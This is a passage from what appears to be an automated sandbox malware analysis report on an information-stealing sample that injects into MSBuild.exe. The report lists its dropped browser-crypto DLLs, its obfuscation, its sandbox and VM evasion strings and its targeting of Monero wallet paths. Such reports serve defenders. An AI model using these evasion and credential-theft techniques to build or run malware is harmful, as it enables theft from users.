etProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418ADE
PE file contains sections with non-standard names
Source: sql[1].dll.1.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: softokn3[1].dll.1.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0C1AA push ecx; ret 0_2_00E0C1BD
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB71AD push ecx; ret 0_2_00DB71C0
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0C5D6 push 800003C3h; ret 0_2_00E0C5DD
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0C56A push cs; retn 0003h 0_2_00E0C58D
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0C654 push cs; retf 0003h 0_2_00E0C655
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0EBED push 0000004Ch; iretd 0_2_00E0EBFE
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DFAE1D push ecx; ret 0_2_00DFAE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042F2D2 push ecx; ret 1_2_0042F2E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00422EC9 push esi; ret 1_2_00422ECB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041DF45 push ecx; ret 1_2_0041DF58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00432715 push 0000004Ch; iretd 1_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB8B536 push ecx; ret 1_2_6CB8B549
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B71AD push ecx; ret 8_2_001B71C0
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\AAFIIJDAAA.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\AAFIIJDAAA.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418ADE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.T2bmenoX1o.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T2bmenoX1o.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7300, type: MEMORYSTR
Country aware sample found (crashes after keyboard check)
Source: c:\users\user\desktop\t2bmenox1o.exe Event Logs and Signature results: Application crash and keyboard check
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: T2bmenoX1o.exe, MSBuild.exe Binary or memory string: DIR_WATCH.DLL
Source: MSBuild.exe, 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: T2bmenoX1o.exe, MSBuild.exe Binary or memory string: SBIEDLL.DLL
Source: T2bmenoX1o.exe, MSBuild.exe Binary or memory string: API_LOG.DLL
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 1_2_0040180D
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\T2bmenoX1o.exe API coverage: 4.0 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 7.9 %
Source: C:\ProgramData\AAFIIJDAAA.exe API coverage: 4.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8016 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8028 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 8176 Thread sleep count: 85 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EC3h 1_2_00410DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DC9ABF FindFirstFileExW, 0_2_00DC9ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00416013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 1_2_0041547D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00409CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 1_2_00414D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040D59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0040BF22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040B914
